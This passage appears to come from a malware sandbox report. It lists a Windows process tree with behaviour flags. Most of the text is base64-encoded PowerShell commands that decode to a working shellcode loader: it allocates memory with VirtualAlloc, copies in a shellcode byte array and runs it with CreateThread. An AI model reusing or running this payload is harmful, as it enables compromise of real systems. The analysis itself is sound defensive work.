FMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA='"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwAMAB4ADMAMQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZAA2ACwAMAB4AGQANgAsADAAeABlADcALAAwAHgANAAzACwAMAB4ADAANwAsADAAeAA5AGQALAAwAHgAYQAwACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgA2ACwAMAB4AGYAZQAsADAAeAAxAGMALAAwAHgAYgAyACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAMgBlACwAMAB4AGIAYgAsADAAeAAyADQALAAwAHgAYgA2ACwAMAB4ADYANAAsADAAeABjADgALAAwAHgAYgA2ACwAMAB4ADEAZQAsADAAeABiADUALAAwAHgAMABlACwAMAB4ADcAOQAsADAAeAA1ADEALAAwAHgAYgBiACwAMAB4ADIAMgAsADAAeAA3AGIALAAwAHgAYQA5ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgAMAA5ACwAMAB4AGMAMQAsADAAeABmAGUALAAwAHgANgA3ACwAMAB4ADAAYQAsADAAeAAxADIALAAwAHgANwBjACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4ADIANgAsADAAeAAzADAALAAwAHgAMAA3ACwAMAB4ADYAMgAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGQAZQAsADAAeABlADEALAAwAHgAZAA0ACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYQBlACwAMAB4AGYAOAAsADAAeAA2ADUALAAwAHgANwA5ACwAMAB4AGMANQAsADAAeAAwADUALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABjACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4AGQANAAsADAAeAA2AGYALAAwAHgAYwAyACwAMAB4ADkANwAsADAAeABiADAALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABjADgALAAwAHgAMQBkACwAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgAOAAyACwAMAB4ADgAYwAsADAAeABkADYALAAwAHgAZABlACwAMAB4ADYAYgAsADAAeAA0AGYALAAwAHgAZAA3ACwAMAB4ADgAMgAsADAAeABmAGIALAAwAHgAOAAzACwAMAB4ADEANQAsADAAeAAzAGQALAAwAHgAZgBjACwAMAB4ADgAYgAsADAAeAAyAGUALAAwAHgANABlACwAMAB4AGMAZQAsADAAeAAxADQALAAwAHgAOAA0ACwAMAB4AGQAOAAsADAAeAA2ADIALAAwAHgAZABjACwAMAB4ADAAMgAsADAAeAAxAGUALAAwAHgAZgAyACwAMAB4AGMAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGIAYwAsADAAeAA5AGIALAAwAHgANAA4ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAYgAyACwAMAB4ADgAZQAsADAAeABhADUALAAwAHgAZQBjACwAMAB4AGEAYwAsADAAeAAyADcALAAwAHgAYwA2ACwAMAB4ADYANgAsADAAeAAyAGQALAAwAHgAYwA4ACwAMAB4ADEAMwAsADAAeAAxADIALAAwAHgAMgA3ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAAxAGUALAAwAHgAMwA0ACwAMAB4ADgAZQAsADAAeAA5ADAALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAAwADcALAAwAHgANwA2ACwAMAB4ADcAMgAsADAAeABkADEALAAwAHgANAA4ACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgAOAAxACwAMAB4ADIAOAAsADAAeAA5ADcALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABhADYALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABmADMALAAwAHgANgBjACwAMAB4ADYAMQAsADAAeAA5ADAALAAwAHgAMQBiACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADgANQAsADAAeAA0ADAALAAwAHgAOQAxACwAMAB4AGEAZAAsADAAeAA0AGEALAAwAHgANQBmACwAMAB4AGQAZgAsADAAeABlAGQALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeAAxAGYALAAwAHgAYQAzACwAMAB4ADIAMQAsADAAeAAxADgALAAwAHgAMwAzACwAMAB4ADUAMwAsADAAeABjADIALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgAZABkACwAMAB4ADQAZAAsADAAeAAwADQALAAwAHgAZgA5ACwAMAB4ADQAYgAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4AGEAZQAsADAAeABlADMALAAwAHgANwAwACwAMAB4AGYANgAsADAAeAA5ADgALAAwAHgAYQBiACwAMAB4ADgAYgAsADAAeABkAGQALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAxAGUALAAwAHgAOQBlACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAAwAGIALAAwAHgAZABkACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgANgAzACwAMAB4AGIAOQAsADAAeABmAGMALAAwAHgANABjACwAMAB4ADkANgAsADAAeABjADYALAAwAHgAMgA4ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgANQAzACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYANAAsADAAeABiAGIALAAwAHgANQBlACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgANgA0ACwAMAB4AGEAMAAsADAAeAAwADIALAAwAHgAYwAyACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgANgBhACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgANABiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAGYAbQB5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAGYAbQB5AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABVAGYAbQB5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\puac5sfh\puac5sfh.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:3084

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8702.tmp" "c:\Users\Admin\AppData\Local\Temp\puac5sfh\CSCD7008215C0BD4A219355344C867FDC5.TMP"
6⤵
PID:5092

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc82d89758,0x7ffc82d89768,0x7ffc82d89778
2⤵
PID:4744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:2
2⤵
PID:200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1872 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:4556

C:\Program Files\Google\Chrome\Application\chrome.exe
